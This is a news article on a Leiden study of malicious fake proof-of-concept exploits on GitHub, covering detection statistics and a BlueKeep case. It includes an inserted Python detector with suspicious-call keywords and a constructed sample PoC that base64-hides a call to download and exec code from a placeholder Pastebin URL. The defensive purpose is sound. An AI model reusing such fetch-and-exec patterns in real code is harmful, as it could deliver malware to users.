Security Experts Uncover Thousands of Malicious CVE PoC Exploits on GitHub

Researchers have discovered thousands of GitHub repositories that provide fake proof-of-concept (PoC) exploits for various flaws used to distribute malware.

A team of researchers from the Institute for Advanced Computer Science in Leiden (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub offering fake proof-of-concept (PoC) exploits for multiple vulnerabilities.

The experts analyzed PoCs shared on GitHub for known vulnerabilities disclosed between 2017 and 2021; some of these repositories were used by threat actors to spread malware.

Experts point out that public code repositories do not guarantee that any given PoC comes from a trusted source.

“We found that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e. they don’t actually provide PoC functionality) or even malicious: for example, they try to steal data from the system running them, or they try to install malware on that system.” reads the research paper published by the experts.

The team looked for a set of symptoms in the collected dataset, such as calls to malicious IP addresses, encoded malicious code, or binaries containing Trojan horses. The researchers analyzed 47,313 repositories, of which 4,893 were malicious (i.e., 10.3% of the repositories studied showed symptoms of malicious intent).

“This figure shows a worrying prevalence of dangerous malicious PoCs in exploit code distributed on GitHub.” continues the paper.

The researchers extracted a total of 358,277 IP addresses from the repositories, of which 150,734 were unique and 2,864 matched blacklist entries. VirusTotal flagged 1,522 of the IP addresses as malicious, of which 1,069 were listed in the AbuseIPDB database.

Most malicious detections are related to vulnerabilities from 2020.

During the research, experts discovered multiple examples of malicious PoCs developed for CVEs and shared some case studies.

One such example is related to the PoC developed for CVE-2019-0708 (also known as BlueKeep).

“This repository was created by a user named Elkhazrajy. The source code contains a base64 line that runs once decoded. It contains another Python script with a link to Pastebin which will be saved as a VBScript and then run by the first exec command. After investigating the VBScript, we found that it contains Houdini malware.” continues the paper.

Another example detailed by the experts is related to malicious PoCs designed to gather information on the system running them. In this case, the URL of the server used for data exfiltration was base64 encoded.
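As an added example, not code from the paper or from this article, the following Python checker applies the symptoms described above to a constructed PoC source file: a hard-coded IP address checked against a sample blocklist, a long base64 run that is decoded and inspected for exec-style calls, and a Pastebin link hidden inside that decoded payload, mirroring the BlueKeep case. The blocklist entry, the sample file and the Pastebin URL are all constructed placeholders; the decoded payload is only inspected, never executed.

```python
import base64
import binascii
import re

# Constructed sample blocklist (TEST-NET-3 address); not AbuseIPDB/VirusTotal data.
SAMPLE_BLOCKLIST = {"203.0.113.7"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64-looking runs
PASTE_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/\S+", re.I)
SUSPICIOUS_CALLS = ("exec(", "eval(", "subprocess", "os.system", "wscript", "powershell")


def decode_b64_blobs(text):
    """Return the decoded text of every long base64 run that decodes cleanly to UTF-8."""
    decoded_blobs = []
    for blob in B64_RE.findall(text):
        try:
            decoded_blobs.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # random identifiers or hashes that merely look like base64
    return decoded_blobs


def scan_poc(source, blocklist=SAMPLE_BLOCKLIST):
    """Return a sorted list of symptom labels found in a PoC source string."""
    symptoms = set()
    for ip in IP_RE.findall(source):
        if ip in blocklist:
            symptoms.add("blocklisted_ip")
    if PASTE_RE.search(source):
        symptoms.add("paste_site_url")
    for decoded in decode_b64_blobs(source):       # look inside encoded payloads
        if any(call in decoded.lower() for call in SUSPICIOUS_CALLS):
            symptoms.add("b64_hidden_code")
        if PASTE_RE.search(decoded):
            symptoms.add("b64_hidden_paste_url")
    return sorted(symptoms)


# Constructed sample mimicking the pattern in the text: a base64 line that hides
# a second script with a Pastebin link. 'download' is a placeholder, not a real call.
HIDDEN = "exec(download('https://pastebin.com/raw/PLACEHOLDER'))\n"
SAMPLE_POC = (
    "import base64\n"
    "TARGET = '203.0.113.7'\n"
    "exec(base64.b64decode('" + base64.b64encode(HIDDEN.encode()).decode() + "'))\n"
)

if __name__ == "__main__":
    print(scan_poc(SAMPLE_POC))  # ['b64_hidden_code', 'b64_hidden_paste_url', 'blocklisted_ip']
```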

The researchers explained that their study had several limitations. For example, the GitHub API proved unreliable and did not collect all repositories corresponding to the CVE IDs used.

Another limitation is related to the use of heuristics to detect malicious PoCs. The experts explained that this approach could miss some malicious PoCs in their dataset.

“However, this approach cannot detect every malicious PoC based on the source code, as there is always the possibility of finding more creative ways to obfuscate it. We have included code similarity as a measure to help identify new malicious repositories. Our results show that, in fact, the average similarity between malicious repositories is higher than that of non-malicious repositories.” concluded the experts. “This result is the first step in developing a more robust detection technique.”

The researchers have shared their findings with GitHub, but some of the malicious repositories have not been removed.

Pierluigi Paganini
